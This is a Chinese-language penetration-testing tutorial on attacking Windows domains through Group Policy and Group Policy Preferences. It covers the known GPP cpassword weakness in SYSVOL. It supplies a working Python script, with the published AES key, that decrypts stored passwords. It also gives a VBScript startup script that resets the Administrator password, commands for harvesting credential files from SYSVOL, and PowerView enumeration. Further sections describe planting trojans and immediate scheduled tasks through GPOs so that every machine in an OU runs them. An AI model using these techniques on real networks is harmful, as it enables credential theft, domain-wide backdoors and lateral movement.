渗透中组策略GPP的运用

关于组策略

组策略可以控制用户帐户和计算机帐户的工作环境。组策略提供了操作系统、应用程序和活动目录中用户设置的集中化管理和配置。可以设置一次组策略然后在多台计算机上使用。
大多数组织机构为了安全，可能都会要求修改密码，标准的做法是利用组策略批量设置工作站的本地 Administrator 密码，这样带来的问题就是如果黑客拿到了一个系统的 Administrator 认证凭据，就能拿到所有机器的权限。
其中一种解决方法就是使用 SYSVOL（活动目录中的全域共享文件夹），可以在所有域控中进行自动同步和共享，所有认证用户都可以读取，其中包括登录脚本，组策略数据和其他域控所需要的域数据。

位置：\<domain>\SYSVOL\<domain>\Policies\</domain></domain>

在 win2008 中发布了 GPP（组策略偏好），GPP 提供了一个自动化机制，利用显式凭据结合组策略部署了计划任务，一次性批量更改了电脑的本地管理的密码。
当管理创建了一个新的 GPP 时，SYSVOL 里有一个 XML 文件存放了 AES-256 加密后的密码，但微软却在 2012 年发布了 AES 的私钥。。。
因为所有域用户对 SYSVOL 都有读权限，在域里的任何用户可以搜索 SYSVOL 共享中的带有 cpassword 字样的 XML 文件，里面包含了 AES 加密的密码。

利用本地组策略加载后门

gpedit.msc->本地组策略编辑器->window设置(system)->脚本->启动
可以在里面添加木马（复制到 C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup）或者 ps1 脚本文件。

重启后 cs 上线

域组策略

机器有域环境的话，系统管理工具会多出组策略管理功能，域管理员能够很方便统一地对域内的机器和用户进行统一管理。
AD域中两个默认的共享文件夹:SYSVOL NETLOGON

NETLOGON目录

挂载点:SYSVOL\domain\SCRIPTS 主要存放的是一些脚本信息，是AD活动目录安装时候自动创建的，是在sysvol下面的一个子目录文件夹

SYSVOL目录

SYSVOL目录是AD域中的一个共享文件夹，该文件夹在AD活动目录安装时候被创建。通常用来存放组策略数据 和 一些脚本 配置文件，这些策略和脚本将用于传递给域成员机器。

域组策略的利用

直接执行脚本
和本地组策略的利用类似，在组策略编辑器中添加一个启动脚本

strComputer = "."
Set objUser = GetObject("WinNT://" & strComputer & "/Administrator, user")
objUser.SetPassword "123QWE!@#"
objUser.SetInfo

然后强制更新组策略

gpupdate /force

最后查找到被更新的组策略

shell for /r \\dc/sysvol %i in (*.vbs) do @echo %i
shell for /r \\dc/sysvol %i in (*.bat) do @echo %i

GPP漏洞的利用
直接执行脚本只能在 win server 2008 上没打补丁的版本存在，以后的版本无法写入密码，因为如果使用 GPP，输入的用户密码都会以 AES-256 的方式存在 SYSVOL 下对应的 xml 文件中，但在高版本 GPP 就不能输入密码，这个洞也就无了。
现在的攻击手法就是获取 GPP 泄露的密码：
在组策略管理中新建一个 OU 组：

在这个 OU 中新建一个使用了 GPP 的本地用户密码的策略，并获取到该 GPO 的 ID

方便演示添加一个新的用户

然后根据这个 ID 到 SYSVOL 中搜索

C:\Windows\SYSVOL\sysvol\god.org\Policies\{2559CA36-02A9-4C7A-AC1F-553AC2C1A567}\Machine\Preferences\Groups

可以看到 gpptest 用户名对应的加密密码，这里用 python 脚本解密一下

#!/usr/bin/python
#
# Gpprefdecrypt - Decrypt the password of local users added via Windows 2008 Group Policy Preferences.
#
# This tool decrypts the cpassword attribute value embedded in the Groups.xml file stored in the domain controller's Sysvol share.
#

import sys
from Crypto.Cipher import AES
from base64 import b64decode


# Init the key
# From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
key = """
4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b
""".replace(" ","").replace("\n","").decode('hex')

# Add padding to the base64 string and decode it
cpassword = "AOXP8WcaNw/4jbOKeBQ/zubT3+T5UWA8P7EFVNEh2+E"
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)

# Decrypt the password
o = AES.new(key, AES.MODE_CBC, "\x00" * 16).decrypt(password)

# Print it
print o[:-ord(o[-1])].decode('utf16')

敏感文件搜集

1.命令行下搜索

dir /s /a \\DC\SYSVOL\*.xml

2.Get-GPPPassword.ps1
运行后会自动遍历 SYSVOL 下的敏感文件并将密码解密。
3.通过用户进行查找

查看域内共享
get-domaincomputer|get-netshare
查看域用户信息
Get-DomainUser -identity gpptest
查看该用户的组信息
Get-DomainOU

发现 GPO 的 link 链接，直接去找对应的文件夹就可以了

后门利用

当拿下域控的时候可以用 GPP 指定控制 OU 下的所有用户
1.直接写脚本
直接把木马脚本放在域策略，或新建 GPO 在启动中放入木马，然后将该 GPO 连接到目标 OU 下就可以直接打。
2.计划任务实现远程执行
可定时收集信息且比较隐蔽，使用 New-GPOImmediateTask.ps1 完成。

参考文献

• https://xz.aliyun.com/t/7784#toc-3
• https://www.anquanke.com/post/id/83283